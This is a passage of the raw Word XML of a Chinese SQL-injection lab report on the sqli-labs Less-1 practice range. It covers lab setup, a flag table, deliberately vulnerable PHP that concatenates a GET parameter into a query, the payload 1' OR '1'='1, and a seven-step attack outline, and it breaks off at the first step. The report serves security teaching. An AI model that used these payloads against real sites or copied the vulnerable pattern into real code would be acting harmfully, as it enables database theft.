                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    hint  VARCHAR(100) DEFAULT NULL COMMENT '提示信息',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    PRIMARY KEY (id)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='漏洞验证Flag表';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EA620F1">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>预置核心验证Flag：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>flag{sql_injection_master_2025}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，用于判定注入攻击是否成功获取敏感数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBC562">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="heading_13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.3 环境搭建流程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="29FD4B43">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>采用轻量化快速部署方案，无需复杂服务器配置，具体步骤如下：</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F6BBE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5B11E98">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 1. 导入数据库脚本，自动创建数据表与测试数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>mysql -u root -p &lt; sql/setup.sql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t># 2. 进入靶场项目目录，启动PHP内置Web服务器</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>cd /sqli_lab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>php -S 0.0.0.0:8080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t># 3. 浏览器访问靶场首页，完成环境初始化</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>http://localhost:8080/index.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38D371EA">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="heading_14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3 漏洞原理分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="682FBC3E">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="heading_15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.1 漏洞核心成因</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="1B6F2C6D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL注入漏洞的本质核心是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL代码逻辑与用户输入数据未做隔离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。正常Web应用应严格区分“SQL语法结构”和“用户输入数据”，而存在漏洞的代码会直接将用户可控输入通过字符串拼接的方式嵌入动态SQL语句，导致攻击者输入的恶意字符、SQL指令被数据库解析为语法逻辑，篡改原有查询语义，执行非授权数据库操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C5029F">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>典型漏洞代码（PHP）：</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12EEE03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C23F7C0">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 直接拼接用户GET参数，无任何过滤与预处理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$id = $_GET['id'];</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$sql = "SELECT * FROM users WHERE id = '$id' LIMIT 0,1";</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EE3F9EB">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>当攻击者输入Payload：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>1' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，拼接后SQL语句被篡改：</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7AA4E3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4543F72">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SELECT * FROM users WHERE id = '1' OR '1'='1' LIMIT 0,1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DB0A40D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>原本的用户输入数据变为SQL逻辑语句，永真条件触发，数据库返回全部用户数据，漏洞成功触发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F3288B">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="heading_16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.2 漏洞触发三大必要条件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="6C350761">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL注入漏洞触发必须同时满足以下三个条件，缺一不可，也是代码审计的核心判定依据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219DCC3">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>输入可控性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：用户可自主控制HTTP请求参数（GET/POST/Header参数等），参数可正常传递至后端SQL查询语句；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>动态拼接SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：后端采用字符串拼接、字符串格式化方式构造动态SQL，未使用参数化预处理；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>无安全防护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：未对用户输入做白名单校验、特殊字符转义、类型强制转换等安全处理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9F8A04">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="heading_17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.3 漏洞危害分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="634D152A">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>结合OWASP官方风险定义，SQL注入属于高危漏洞，核心危害包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8F0B98">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（1）数据泄露：非法查询数据库全部数据表、字段、用户隐私数据，造成拖库风险；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（2）权限越权：绕过登录校验、身份认证，以管理员权限访问系统；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（3）数据篡改：执行UPDATE/DELETE语句，篡改、删除系统核心数据；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（4）系统沦陷：高危场景下可执行系统命令、上传木马文件，控制服务器；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（5）业务瘫痪：恶意删除数据表、篡改业务配置，导致Web系统无法正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21154ACE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="heading_18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.4 标准化攻击链路总览</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="79DD4B06">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次实验总结行业通用的7步SQL注入攻击流程，适配所有GET型联合查询注入场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C143F">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注入点探测 → 注入类型判定 → 闭合方式确认 → 查询列数爆破 → 回显位置定位 → 数据库元信息获取 → 敏感数据脱取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30724E9D">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="heading_19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4 漏洞利用——7步标准化攻击链路详解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="2033E56F">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本章以sqli-labs Less-1（GET字符型单引号闭合注入）为标准实验场景，逐步骤复现完整攻击流程，明确每一步的测试逻辑、Payload与判定依据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5BA91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="heading_20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step1：注入点探测（确认漏洞存在）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="5B834FD8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心目的：验证用户输入可拼接至SQL语句，且可篡改SQL语法。通过单引号闭合测试，利用MySQL语法报错特性判定注入点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E66A33">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
